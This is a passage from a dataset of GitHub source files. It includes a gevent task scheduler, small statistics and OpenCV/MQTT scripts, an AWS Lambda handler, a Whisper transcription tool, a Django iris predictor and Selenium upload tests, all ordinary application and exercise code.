raw_schedule[\"vm_capacities\"]\n self.allow_share = self.allow_share or raw_schedule[\"allow_share\"]\n self.allow_preemptive = self.allow_preemptive or raw_schedule[\"allow_preemptive\"]\n\n self.tasks = {}\n self.machines = []\n for raw_machine in raw_schedule[\"machines\"]:\n machine = Machine(capacities)\n self.machines.append(machine)\n for raw_task in raw_machine:\n tid = raw_task[\"id\"]\n self.tasks[tid] = self.task_cls(\n tid, raw_task[\"runtime\"], raw_task[\"resources\"],\n raw_task[\"start_time\"], machine)\n\n for raw_machine in raw_schedule[\"machines\"]:\n for raw_task in raw_machine:\n task = self.tasks[raw_task[\"id\"]]\n for sid in raw_task[\"succs\"]:\n task.succs.append(self.tasks[sid])\n self.tasks[sid].remaining_prevs += 1\n for comm in raw_task[\"output\"]:\n to_task = self.tasks[comm[\"to_task\"]]\n to_task.remaining_prevs += 1\n data = self.comm_cls(task, to_task, comm[\"data_size\"],\n comm[\"start_time\"],\n comm[\"finish_time\"])\n task.outputs.append(data)\n\n def exec_task(self, task):\n if self.log: print(\"[S][{:.2f}s]{}\".format(timer() - self.RST, task))\n task.execute()\n self.remaining_tasks -= 1\n task.machine.add_resources(task.resources)\n\n for t in task.succs:\n t.remaining_prevs -= 1\n if not t.remaining_prevs:\n self.ready_tasks.add(t)\n for c in task.outputs:\n self.ready_comms.add(c)\n if self.log:\n print(\"[F][{:.2f}s]{}[{}/{}]\".format(\n timer() - self.RST, task, self.num_tasks -\n self.remaining_tasks, self.num_tasks))\n\n def exec_comm(self, comm):\n if self.log: print(\"[S][{:.2f}s]{}\".format(timer() - self.RST, comm))\n from_task = comm.from_task\n to_task = comm.to_task\n\n comm.execute()\n if not self.allow_share:\n from_task.machine.finish_sending_comm()\n to_task.machine.finish_receiving_comm()\n\n to_task.remaining_prevs -= 1\n if not to_task.remaining_prevs:\n self.ready_tasks.add(comm.to_task)\n if self.log: print(\"[F][{:.2f}s]{}\".format(timer() - self.RST, comm))\n\n def comm_is_ready(self, comm):\n if self.allow_share:\n return True\n elif self.allow_preemptive:\n for current_comm in [\n comm.from_task.machine.current_sending,\n comm.to_task.machine.current_receiving\n ]:\n current_comm = comm.from_task.machine.current_sending\n if current_comm and current_comm.planned_ft < comm.planned_ft:\n return False\n return True\n else:\n return not (comm.from_task.machine.current_sending\n or comm.to_task.machine.current_receiving)\n\n def task_is_ready(self, task):\n return all(\n x >= y\n for x, y in zip(task.machine.remaining_resources, task.resources))\n\n def schedule(self):\n current_time = timer() - self.RST\n for t in sorted(self.ready_tasks, key=lambda t: t.planned_st):\n if t.planned_st > current_time:\n break\n if self.task_is_ready(t) and t in self.ready_tasks:\n self.ready_tasks.remove(t)\n t.machine.remove_resources(t.resources)\n self.group.spawn(self.exec_task, t)\n for c in sorted(self.ready_comms, key=lambda c: c.planned_st):\n if c.planned_st > current_time:\n break\n if self.comm_is_ready(c) and c in self.ready_comms:\n self.ready_comms.remove(c)\n if not self.allow_share:\n c.from_task.machine.add_sending_comm(c)\n c.to_task.machine.add_receiving_comm(c)\n self.group.spawn(self.exec_comm, c)\n\n def prepare_workers(self, **kwargs):\n pass\n\n def run(self, log=\"d\", **kwargs):\n self.remaining_tasks = self.num_tasks\n self.prepare_workers(verbose=(log == \"d\"), **kwargs)\n self.RST = timer()\n self.ready_tasks = set(\n [t for t in self.tasks.values() if not t.remaining_prevs])\n self.ready_comms = set()\n self.group = gevent.pool.Group()\n if log == \"d\": self.log = True\n elif log == \"p\":\n pbar = tqdm(\n total=self.num_tasks-1,\n unit=\"task\",\n desc=\"{:<32}\".format(self.alg_name))\n while self.remaining_tasks:\n self.schedule()\n if log == \"p\":\n pbar.update(self.num_tasks - self.remaining_tasks - pbar.n)\n gevent.sleep(0.1)\n if log == \"p\": pbar.close()\n else:\n print(\"Makespan of {}: {:.2f}s\".format(self.alg_name,\n timer() - self.RST))\n\n\nif __name__ == \"__main__\":\n from sys import argv\n s = Scheduler(allow_share=True, log=True)\n for path in argv[1:]:\n s.load(path)\n s.run()\n","repo_name":"Tefx/WINO","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":9147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8166895485","text":"import numpy as np \nfrom matplotlib import pyplot as plt \n\ndef load():\n\twith open('CloudSeeding.txt') as f:\n\t\tdataSet = []\n\t\tfor line in f.readlines()[1:]:\n\t\t\tdataSet.append(list(map(float, line.strip().split())))\n\t\treturn np.array(dataSet)\n\n\t\t\nif __name__ == '__main__':\n\tcloud = load()\n\tX = cloud[:,0]\n\tY = cloud[:,1]\n\tx_hat = np.mean(X)\n\ty_hat = np.mean(Y)\n\ttheta_hat = x_hat - y_hat\n\tse_theta = np.sqrt(np.var(X) + np.var(Y))\n\t# 95% confidence interval\n\tCn = (theta_hat-1.96*se_theta, theta_hat+1.96*se_theta)\n\tprint(\"theta:\",theta_hat)\n\tprint( \"se(theta):\", se_theta) \n\tprint('95% confidence interval:',Cn)\n","repo_name":"DreamerDiWu/all_of_statistic","sub_path":"chapter7/CloudSeedingEstm.py","file_name":"CloudSeedingEstm.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8079583390","text":"import cv2 as cv\nimport numpy as np\nimport paho.mqtt.publish as publish\nimport drivers\n\n# hostname del servidor MQTT (en este caso el mismo Rpi)\nHOST_NAME = \"192.168.1.17\"\n\n# Rangos de detección en HSV\ngreen_range_low = np.array([20, 0, 108])\ngreen_range_high = np.array([88, 51, 192])\npink_range_low = np.array([157, 50, 140])\npink_range_high = np.array([180, 110, 220])\n\n# contador de productos\ncount = {'Pink': 0, 'Green': 0}\n\n# inicialización del LCD (ver drivers y enlace para instalación)\ndisplay = drivers.Lcd()\ndisplay.lcd_display_string(\"*Detector de\", 1)\ndisplay.lcd_display_string(\"colores -- sdca*\", 2)\n\n\ndef frame_and_publish(src):\n global x_prev, count\n src_hsv = cv.cvtColor(src, cv.COLOR_BGR2HSV)\n # Aquí se agregarían más etiquetas\n mask = {'Pink': cv.inRange(src_hsv, pink_range_low, pink_range_high),\n 'Green': cv.inRange(src_hsv, green_range_low, green_range_high)}\n poly_approx = {'Pink': [], 'Green': []}\n\n for color in count:\n contours, hierarchy = cv.findContours(mask[color], cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n i = 0\n for contour in contours:\n area = cv.contourArea(contour)\n if area > 12000: # depende de la distancia de cámara, puede escogerse el área mayor también\n perimeter = cv.arcLength(contour, True)\n poly_approx[color].append(cv.approxPolyDP(contour, 0.02 * perimeter, True))\n x, y, w, h = cv.boundingRect(poly_approx[color][i])\n if x == 0 and x_prev != 0:\n count[color] += 1\n # colocar más datos si hay más etiquetas\n publish.single(\"data\", \"{},{}\".format(count['Pink'], count['Green']), hostname=HOST_NAME)\n display.lcd_clear()\n # cuestión de acomodar si hay más etiquetas\n display.lcd_display_string(\"Rosados: {}\".format(count['Pink']), 1)\n display.lcd_display_string(\"Verdes: {}\".format(count['Green']), 2)\n # En caso se quiera visualizar con conexión HDMI\n # Dibujar el contorno que es detectado\n # cv.drawContours(src, poly_approx[color], i, (0, 0, 255), 2)\n # Dibujar el rectángulo mínimo que lo rodea\n # cv.rectangle(src, (x, y), (x + w, y + h), (0, 255, 0), 1)\n # Colocar la etiqueta\n # cv.putText(src, '{}: {}'.format(color, count[color]), (x, y - 5), 1, 1.3,\n # (255, 255, 0), 1, cv.LINE_AA)\n i += 1 # el i solo avanza para los contornos que se deben dibujar\n x_prev = x\n return x_prev\n\n\ncap = cv.VideoCapture(0)\nx_prev = 10\ntry:\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n frame_and_publish(frame)\n # Mostrar las imágenes en pantalla (HDMI)\n # cv.imshow('captura', frame)\n # cv.waitKey(10)\nexcept KeyboardInterrupt:\n print('\\nSaliendo del programa ...')\n display.lcd_clear()\n","repo_name":"sadelcarpio/color-detector-node-red","sub_path":"detect_and_frame.py","file_name":"detect_and_frame.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"72780165330","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n \n \n\ndef web_sclink(data): \n# Making a GET request\n r = requests.get(data)\n \n# Parsing the HTML\n soup = BeautifulSoup(r.content, 'html.parser')\n ans=[]\n# find all the anchor tags with \"href\"\n for link in soup.find_all('a'):\n ans.append(link.get('href'))\n\n return ans \n\n","repo_name":"jitanshuraut/PYthon-Project","sub_path":"Backed-End/web_scaper_link.py","file_name":"web_scaper_link.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32230274269","text":"class Solution(object):\n def advantageCount(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n # 田忌赛马\n n = len(nums2) # len(nums1) == len(nums2)\n # O(nlogn)\n # nums1 由小排到大\n nums1.sort()\n index = [i for i in range(n)]\n # O(nlogn)\n # 将 nums2 的 index 按照 value 由大排到小\n index.sort(key=lambda i:nums2[i], reverse=True)\n res = [0 for i in range(n)]\n for i in index:\n # Win\n if nums1[-1] > nums2[i]:\n res[i] = nums1.pop()\n # Lose\n else:\n res[i] = nums1.pop(0)\n return res ","repo_name":"max870701/LeetCodeRecord-Python3-","sub_path":"870-AdvantageShuffle.py","file_name":"870-AdvantageShuffle.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2203254322","text":"import boto3\ndb = boto3.client('dynamodb')\nimport datetime\ndate=datetime.date.today()\n\ndef lambda_handler(event, context):\n message = event['Records'][0]['Sns']['Message']\n id = event['Records'][0]['Sns']['MessageId']\n\n response = db.put_item(\n Item={\n 'Date': {\n 'S': str(date),\n },\n 'MessageID': {\n 'S': id,\n },\n 'Message': {\n 'S': message,\n },\n },\n ReturnConsumedCapacity='TOTAL',\n TableName='15projectTABLE',\n )\n\n print(response)","repo_name":"cbates255/Python","sub_path":"Pythonprojects/15projectFINAL.py","file_name":"15projectFINAL.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29278760610","text":"# Ce script permet de télécharger un fichier du serveur FTP vers un dossier en local défini\n\nfrom ftplib import FTP\nimport os\n\n# Importe nos fonctions utiles\nimport sys\nsys.path.insert(0, '../')\nfrom utils import func\n\nfrom ftp import ftp_login\n\n# Importer les variables globales\nimport settings\n\n# Charge les paramètres\nsettings.init()\n\nftp = ftp_login.login()\n\ndef download():\n # Client dossier sauvegarde\n savedir = \"C:/Users/t.echnicien/Desktop/Reception_FTP\"\n os.chdir(savedir)\n\n # Serveur - se mettre dans le bon répertoire\n #ftp.cwd(\"MainFTP\")\n # Serveur - nom fichier à copier\n filename = \"Test.txt\"\n try:\n file = open(filename, \"wb\")\n except Exception as e:\n print(\"Problème lors de l'ouverture du fichier\")\n print(\"Erreur complète :\\n\", e)\n ftp.retrbinary('RETR ' + filename, file.write, 1024)\n try:\n file.close()\n except Exception as e:\n print(\"Problème lors de la fermeture du fichier\")\n print(\"Erreur complète :\\n\", e)\n print(\"Téléchargement terminé\\n\")\n","repo_name":"AngeIo/projet_python_netway","sub_path":"superscript/ftp/ftp_download.py","file_name":"ftp_download.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71019915731","text":"import random\n\ni = int(0)\nnumbers = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nnegativeNumbers = []\nwhile i < 10:\n numbers[i] = int(random.uniform(-10, 10))\n i += 1\ni = int(0)\noddSum = int(0)\nk = int(0)\nmin = numbers[0]\nwhile i < 10:\n if numbers[i] < min:\n min = numbers[i]\n if numbers[i] < 0:\n negativeNumbers.append(numbers[i])\n if numbers[i] % 2 == 0:\n k += 1\n oddSum += numbers[i]\n i += 1\n\nprint(\"Максимальный отрицательный элемент массива: \", min)\nprint(\"Среднее арифметическое нечётных чисел равно \", oddSum / k)\nprint(\"Все отрицательные элементы: \")\ni = int(0)\nwhile i < len(negativeNumbers):\n print(negativeNumbers[i])\n i += 1\n","repo_name":"DanyilMykytenko/Uni","sub_path":"Python/Lab 1/Task 3/Task 3/Task_3.py","file_name":"Task_3.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37580170625","text":"from typing import Any\n\nfrom ..file_types import FileTypeName\n\n\nclass FileValues:\n def __init__(self, file_name: str, type_name: FileTypeName, values: list[dict[str, str]]):\n \"\"\"\n Represents the values of an env file.\n :param file_name: Name of the file uploaded. Could be specified by the user or the default name.\n :param type_name:\n :param values: List containing the [\"KEY\", \"VALUE\"] of an env file\n \"\"\"\n self.file_name = file_name\n self.type_name = type_name\n self.values = values\n","repo_name":"ftapiat/env-compare-rest","sub_path":"src/models/file_values/file_values.py","file_name":"file_values.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"41245559095","text":"# 一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。 \n# \n# 机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。 \n# \n# 问总共有多少条不同的路径? \n# \n# \n# \n# 例如,上图是一个7 x 3 的网格。有多少可能的路径? \n# \n# \n# \n# 示例 1: \n# \n# 输入: m = 3, n = 2\n# 输出: 3\n# 解释:\n# 从左上角开始,总共有 3 条路径可以到达右下角。\n# 1. 向右 -> 向右 -> 向下\n# 2. 向右 -> 向下 -> 向右\n# 3. 向下 -> 向右 -> 向右\n# \n# \n# 示例 2: \n# \n# 输入: m = 7, n = 3\n# 输出: 28 \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= m, n <= 100 \n# 题目数据保证答案小于等于 2 * 10 ^ 9 \n# \n# Related Topics 数组 动态规划 \n# 👍 765 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n # dp[i, j] = dp[i-1, j] + dp[i, j-1]\n def uniquePaths(self, m: int, n: int) -> int:\n if m == 0 or n == 0:\n return 0\n\n dp = []\n for j in range(n):\n dp.append([0] * m)\n\n for i in range(0, n):\n dp[i][0] = 1\n for j in range(0, m):\n dp[0][j] = 1\n for i in range(1, n):\n for j in range(1, m):\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[-1][-1]\n\nif __name__ == '__main__':\n s = Solution()\n print(s.uniquePaths(7, 3))\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"dozaza/my-leet-code","sub_path":"src/main/python/question_0062.py","file_name":"question_0062.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22039015667","text":"#!/opt/loca/bin/python\nimport sys, re, itertools, optparse\nfrom math import *\n\noptParser = optparse.OptionParser( \n \n usage = \"python %prog [options] \",\n \n description=\n \"This script takes output from the modified_SPIA R pipeline \" +\n \"and removes the unwieldy and really long list of hits for each miRNA.\",\n \n epilog = \n \"Written by Warren McGee (warren-mcgee@fsm.northwestern.edu), \" +\n \"Jane Wu Lab, Northwestern University, Chicago, USA. (c) 2014. \" + \n \"Released under the terms of the GNU General Public License v3.\" )\n\n(opts, args) = optParser.parse_args()\n\n\nif len( args ) != 2:\n sys.stderr.write( sys.argv[0] + \": Error: Please provide two arguments.\\n\" )\n sys.stderr.write( \" Call with '-h' to get usage information.\\n\" )\n sys.exit( 1 )\n\nin_file = args[0]\nout_file = args[1]\n\nwith open(in_file, 'r') as input:\n\twith open(out_file, 'w') as output:\n\t\theader = input.readline()\n\t\theaderList = header.split(\"\\t\")\n\t\tbadIndex = headerList.index(\"DEgeneList\")\n\t\t\n\t\theaderList.pop(badIndex)\n\t\tnewHeader = \"\\t\".join(headerList)\n\t\toutput.write(newHeader)\n\t\t\n\t\tfor line in input.readlines():\n\t\t\tlineList = line.split(\"\\t\")\n\t\t\t\n\t\t\tlineList.pop(badIndex)\n\t\t\tnewLine = \"\\t\".join(lineList)\n\t\t\toutput.write(newLine)\n","repo_name":"warrenmcg/TDP43_miRNA_Paper","sub_path":"step_7/removeBabelomicHitList.py","file_name":"removeBabelomicHitList.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1660971697","text":"# -*- coding: utf-8 -*-\nfrom omg.utils.dget import dget\nfrom omg.utils.age import age\n\n\ndef _col_version(res):\n vers = dget(res, [\"res\", \"status\", \"versions\"])\n if vers:\n operator_v = [v[\"version\"] for v in vers if v[\"name\"] == \"operator\"]\n if operator_v:\n return operator_v[0]\n return \"\"\n\n\ndef _col_available(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n available = [c[\"status\"] for c in conds if c[\"type\"] == \"Available\"]\n if available:\n return available[0]\n return \"Unknown\"\n\n\ndef _col_progressing(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n prog = [c[\"status\"] for c in conds if c[\"type\"] == \"Progressing\"]\n if prog:\n return prog[0]\n return \"Unknown\"\n\n\ndef _col_degraded(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n degraded = [c[\"status\"] for c in conds if c[\"type\"] == \"Degraded\"]\n if degraded:\n return degraded[0]\n return \"Unknown\"\n\n\ndef _col_since(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n ltt = [c[\"lastTransitionTime\"] for c in conds if c[\"type\"] == \"Available\"]\n if ltt:\n yfile_ts = dget(res, [\"yfile_ts\"])\n return age(ltt[0], yfile_ts)\n return \"Unknown\"\n\n\n# Default columns (without -o wide)\n# NAME and AGE cols, if present, with None value,\n# will be handled by build_table function that will\n# fill them with the common name/age column functions\nDEFAULT_COLUMNS = {\n \"NAME\": None,\n \"VERSION\": _col_version,\n \"AVAILABLE\": _col_available,\n \"PROGRESSING\": _col_progressing,\n \"DEGRADED\": _col_degraded,\n \"SINCE\": _col_since\n}\n\n# Wide columns (with -o wide)\n# In addition to the default columns\nWIDE_COLUMNS = {\n}\n","repo_name":"kxr/o-must-gather","sub_path":"omg/get/output/table_modules/ClusterOperator.py","file_name":"ClusterOperator.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"66"} +{"seq_id":"36859584184","text":"\n# open a new file\nf = open(\"datafile.csv\", \"w\")\n\n# write headings, then some data\n# separated by the newline symbol\n# \\n which is like pressing Enter\nf.write(\"NAME,AGE,SEX\\n\")\nf.write(\"Robert,37,M\\n\")\nf.write(\"Kelly,29,F\\n\") \n\n# finish writing the file\nf.close()\n\ninput('Press ENTER to continue...')\n","repo_name":"joeclark-phd/databook","sub_path":"tutorials/tutorial01/writefile.py","file_name":"writefile.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"40941473501","text":"from typing import Union, Optional\n\nfrom pathlib import Path\n\nimport torch\nfrom whisper import Whisper, load_model\n\nfrom psifx.audio.transcription.tool import TranscriptionTool\nfrom psifx.io import vtt, wav\n\n\nclass WhisperTranscriptionTool(TranscriptionTool):\n \"\"\"\n Whisper transcription and translation tool.\n \"\"\"\n\n def __init__(\n self,\n model_name: str = \"small\",\n task: str = \"transcribe\",\n device: str = \"cpu\",\n overwrite: bool = False,\n verbose: Union[bool, int] = True,\n ):\n super().__init__(\n device=device,\n overwrite=overwrite,\n verbose=verbose,\n )\n\n self.model_name = model_name\n self.task = task\n self.model: Whisper = load_model(model_name, device=self.device)\n # Freeze the model.\n self.model.eval()\n for param in self.model.parameters():\n param.requires_grad = False\n\n def inference(\n self,\n audio_path: Union[str, Path],\n transcription_path: Union[str, Path],\n language: Optional[str] = None,\n ):\n \"\"\"\n Whisper's backed transcription method.\n\n :param audio_path: Path to the audio track.\n :param transcription_path: Path to the transcription file.\n :param language: Country-code string of the spoken language.\n :return:\n \"\"\"\n audio_path = Path(audio_path)\n transcription_path = Path(transcription_path)\n\n if self.verbose:\n print(f\"audio = {audio_path}\")\n print(f\"transcription = {transcription_path}\")\n\n wav.WAVReader.check(audio_path)\n vtt.VTTWriter.check(transcription_path)\n\n # PRE-PROCESSING\n # Nothing to do here, the model wants the path of the audio.\n\n # INFERENCE\n with torch.no_grad():\n segments = self.model.transcribe(\n audio=str(audio_path),\n task=self.task,\n language=language,\n verbose=self.verbose > 1,\n )[\"segments\"]\n\n # POST-PROCESSING\n vtt.VTTWriter.write(\n segments=segments, path=transcription_path, overwrite=self.overwrite\n )\n","repo_name":"GuillaumeRochette/psifx","sub_path":"psifx/audio/transcription/whisper/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36786800781","text":"import api_key\nimport pymongo\n\nmongo_client = pymongo.MongoClient(api_key.MONGO_STRING)\ndatabase = mongo_client[\"Pondo2022Database\"]\npoliticians = database[\"Politicians\"]\nparties = database[\"Parties\"]\n\nparty_set = set()\nfor politician in politicians.find({}):\n party_set.add(politician['party'])\n\nfor party in party_set:\n if parties.find_one({ 'name': party }) is not None:\n continue\n parties.insert_one({ 'name': party })","repo_name":"Davit-G/Pondo2022","sub_path":"server/utils/update_parties.py","file_name":"update_parties.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"29095792262","text":"#!/usr/bin/env python\n\"\"\"Bibliography handler\"\"\"\n\nimport argparse\nimport datetime\nimport configparser\nimport logging\nimport re\nimport string\nimport sys\n\nimport mako\nfrom mako.template import Template\nfrom mako.lookup import TemplateLookup\n\nfrom pybib import BibParser\n\ndef main(argv=None):\n # Do argv default this way, as doing it in the functional\n # declaration sets it at compile time.\n if argv is None:\n argv = sys.argv\n\n # Set up out output via logging module\n output = logging.getLogger(argv[0])\n output.setLevel(logging.DEBUG)\n output_handler = logging.StreamHandler() # Default is sys.stderr\n # Set up formatter to just print message without preamble\n output_handler.setFormatter(logging.Formatter(\"%(message)s\"))\n output.addHandler(output_handler)\n\n # Argument parsing\n parser = argparse.ArgumentParser(\n description=__doc__, # printed with -h/--help\n # Don't mess with format of description\n formatter_class=argparse.RawDescriptionHelpFormatter,\n # To have --help print defaults with trade-off it changes\n # formatting, use: ArgumentDefaultsHelpFormatter\n )\n # Only allow one of debug/quiet mode\n verbosity_group = parser.add_mutually_exclusive_group()\n verbosity_group.add_argument(\"-d\", \"--debug\",\n action='store_const', const=logging.DEBUG,\n dest=\"output_level\", default=logging.INFO,\n help=\"print debugging\")\n verbosity_group.add_argument(\"-q\", \"--quiet\",\n action=\"store_const\", const=logging.WARNING,\n dest=\"output_level\",\n help=\"run quietly\")\n parser.add_argument(\"-t\", \"--template\", required=True,\n help=\"template file\", metavar=\"FILE\")\n parser.add_argument(\"-T\", \"--template_path\",\n action='append',\n help=\"search PATH for templates\", metavar=\"PATH\")\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s 1.0\")\n parser.add_argument('bibs', metavar='args', type=str, nargs='+',\n help='bib files to use')\n args = parser.parse_args()\n output_handler.setLevel(args.output_level)\n\n output.info(\"Reading template from {}\".format(args.template))\n mylookup = TemplateLookup(directories=args.template_path,\n input_encoding='utf-8',\n output_encoding='utf-8')\n with open(args.template) as f:\n template_string = \"\".join(f.readlines())\n template = Template(template_string,\n lookup=mylookup,\n default_filters=['decode.utf8'],\n input_encoding='utf-8',\n output_encoding='utf-8')\n\n output.info(\"Parsing bib files\")\n try:\n bib_parser = BibParser()\n entries = bib_parser.parse_bib(args.bibs)\n except Exception as e:\n output.error(\"Error parsing bibliography files\")\n output.error(str(e))\n return 1\n\n substitutions = {\n \"entries\" : entries,\n }\n\n try:\n # Mako doesn't seem to be rendering into utf-8\n # hance decode() here\n print(template.render(**substitutions).decode())\n except Exception as e:\n output.error(\"Error filling in template\")\n output.error(str(e))\n output.error(mako.exceptions.text_error_template().render())\n return 1\n\n return(0)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"von/pyBib","sub_path":"scripts/pyBib.py","file_name":"pyBib.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"6719976686","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\n\n# Create your views here.\ndef home(request):\n return render(request, 'index.html')\n\n@csrf_exempt\ndef result(request):\n #df = pd.read_csv('iris.csv')\n dataset = pd.read_csv('iris.csv')\n \n y = dataset.species #target coluna alvo\n X = dataset.drop('species', axis=1) #todas ascolunas menos target\n\n#train-test-split\n X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=.5)\n\n#train model\n model = LogisticRegression()\n model.fit(X_train, y_train)\n\n#captura dados de entrada\n val1=request.POST['SepalLengthCm']\n val2=request.POST['SepalWidthCm']\n val3=request.POST['PetalLengthCm']\n val4=request.POST['PetalWidthCm']\n\n#predition\n pred = model.predict([[val1,val2,val3,val4]])\n print(pred)\n \n context = {\n 'result': pred\n }\n return render(request, 'result.html',context)","repo_name":"rogerio1982/machine_django","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34107638792","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport unittest\nimport time\nimport os\nfrom app import db\nfrom app.models import Category\n\n\nclass Testcase(unittest.TestCase):\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(30)\n self.base_url = \"http://localhost:5000/\"\n self.verificationErrors = []\n self.accept_next_alert = True\n\n def check_status(self, test_correct, search_message):\n \"\"\"\n Функция проверяет статус задачи и сравнивает его с эталонным\n\n :param test_correct: Задача должна завершиться успешно или нет\n :param search_message: Сообщение, которое должно вернуть приложение\n :return: Если статус или сообщение не совпадают с эталонным, то ставить тесту статус \"Не пройден\"\n \"\"\"\n driver = self.driver\n # Цикл для ожидания завершения задачи\n for i in range(60):\n status_success = ''\n status_fail = ''\n try:\n status_success = driver.find_element_by_id(\"progressbar\").get_attribute(\"testattribute\")\n except:\n pass\n # Поиска сообщения в ответе приложения\n if status_success == 'suc':\n if test_correct:\n if not (search_message in driver.find_element_by_id(\"upload_alert\").text):\n self.fail(\"incorrect\")\n return True\n else:\n self.fail('incorrect')\n\n try:\n status_fail = driver.find_element_by_id(\"alert_container_fail\").get_attribute(\"testattribute\")\n except:\n pass\n if status_fail == 'fail':\n if not test_correct:\n if not (search_message in driver.find_element_by_id(\"upload_alert\").text):\n self.fail(\"incorrect\")\n return True\n else:\n self.fail('incorrect')\n\n time.sleep(1)\n self.fail('time out')\n\n def test_link_zip_file_correct(self):\n \"\"\"\n Тест корректного zip-архива, скачиваемого по ссылке\n\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n link = \"http://spatialkeydocs.s3.amazonaws.com/FL_insurance_sample.csv.zip\"\n driver.find_element_by_id(\"filename\").send_keys(link)\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_link_zip_file_bad(self):\n \"\"\"\n Тест некорректного zip-архива, скачиваемого по ссылке\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n driver.find_element_by_id(\"filename\").send_keys(\"http://www.colorado.edu/conflict/peace/download/peace.zip\")\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Неправильный формат zip-архива')\n\n def test_link_file_correct(self):\n \"\"\"\n Тест корректного файла, скачиваемого по ссылке\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n driver.find_element_by_id(\"filename\").send_keys(\n \"http://samplecsvs.s3.amazonaws.com/Sacramentorealestatetransactions.csv\")\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(True, 'Загрузка и разбор')\n\n def test_link_bad(self):\n \"\"\"\n Тест некорректной ссылки\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.find_element_by_id(\"filename\").clear()\n driver.find_element_by_id(\"filename\").send_keys(\"incorrect link\")\n driver.find_element_by_id(\"upload_file_btn\").click()\n self.check_status(False, 'Неправильная ссылка')\n\n def test_disk_zip_file_bad(self):\n \"\"\"\n Тест некорректного zip-файла, скачиваемого с диска\n :return:\n \"\"\"\n driver = self.driver\n driver.get(self.base_url + \"/\")\n driver.execute_script('document.getElementById(\"upload\").style=\"\"')\n driver.find_element_by_id(\"upload\").clear()\n driver.find_element_by_id(\"upload\").send_keys(\n os.path.join(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_files'), 'bad.zip'))\n 